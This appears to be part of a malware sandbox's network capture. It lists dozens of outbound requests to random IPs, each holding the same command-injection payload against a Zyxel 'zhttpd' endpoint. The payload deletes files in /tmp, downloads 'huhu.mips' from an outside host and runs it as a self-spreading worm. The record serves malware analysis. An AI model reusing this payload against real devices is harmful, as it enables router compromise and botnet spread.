                                            Feb 2, 2024 06:21:07.521013021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2917192.168.2.155128093.163.81.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521070957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2918192.168.2.1559816220.138.135.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521101952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2919192.168.2.1542220118.179.189.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521146059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2920192.168.2.1546514128.216.83.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521174908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2921192.168.2.154741261.84.49.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521235943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2922192.168.2.154451288.161.220.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521275997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2923192.168.2.155378817.50.15.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521323919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2924192.168.2.155589272.104.24.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521357059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2925192.168.2.154112046.105.30.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521389961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2926192.168.2.1536358200.230.57.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521423101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2927192.168.2.154677650.169.43.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521460056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2928192.168.2.155904695.8.20.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521524906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2929192.168.2.1533520102.107.17.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521559954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2930192.168.2.1533702172.77.136.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521606922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2931192.168.2.15446645.62.87.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521631956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2932192.168.2.1554524191.89.165.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521665096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2933192.168.2.155757882.180.35.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521706104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2934192.168.2.1542408122.117.150.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521747112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2935192.168.2.154159258.119.111.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521781921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2936192.168.2.1557346108.199.97.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521820068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2937192.168.2.1558232178.122.183.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521857023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2938192.168.2.1549484211.95.239.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521895885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2939192.168.2.153391291.82.181.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521917105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2940192.168.2.1533664126.169.213.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.521972895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2941192.168.2.1548354190.103.119.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522010088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2942192.168.2.1550580153.218.66.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522042990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2943192.168.2.1544216146.106.160.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522083044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2944192.168.2.1536016162.154.138.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522121906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2945192.168.2.1533626204.175.180.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522160053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2946192.168.2.1552750109.248.64.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522195101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2947192.168.2.1539228216.35.136.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522228956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2948192.168.2.1548806135.54.57.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522255898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2949192.168.2.1559480122.125.161.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522289038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2950192.168.2.1542464120.214.153.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522350073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2951192.168.2.1550988174.30.85.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522370100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2952192.168.2.1546348148.6.238.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522429943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2953192.168.2.1556088138.129.190.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522464991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2954192.168.2.15348729.162.32.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522505999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2955192.168.2.155139892.201.27.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522538900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2956192.168.2.1533452137.84.189.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522586107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2957192.168.2.1557668202.154.136.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522628069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2958192.168.2.1557348122.220.185.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522663116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2959192.168.2.153411448.232.41.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522696972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2960192.168.2.1549826184.148.216.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522723913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2961192.168.2.1549794124.203.136.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522758961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2962192.168.2.15429984.65.249.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522793055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2963192.168.2.1544554118.128.236.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522845030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2964192.168.2.1554836193.234.80.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522885084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2965192.168.2.154090627.65.4.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522942066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2966192.168.2.154204034.4.28.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.522972107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2967192.168.2.1537986180.15.67.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523008108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2968192.168.2.1543992206.108.108.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523062944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2969192.168.2.155493487.148.226.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523096085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2970192.168.2.1539864210.68.165.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523118019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2971192.168.2.155473263.27.34.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523152113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2972192.168.2.1548030177.180.202.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523176908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2973192.168.2.154038269.145.111.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523216963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2974192.168.2.1537138102.183.233.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523252010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2975192.168.2.155543413.165.227.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523309946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2976192.168.2.154097851.191.242.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523318052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2977192.168.2.1550648179.84.167.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523370028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2978192.168.2.1551886185.11.73.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523401022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2979192.168.2.1542764138.79.161.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523442030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2980192.168.2.1537560162.94.182.110443
                                            TimestampBytes transferredDirectionData
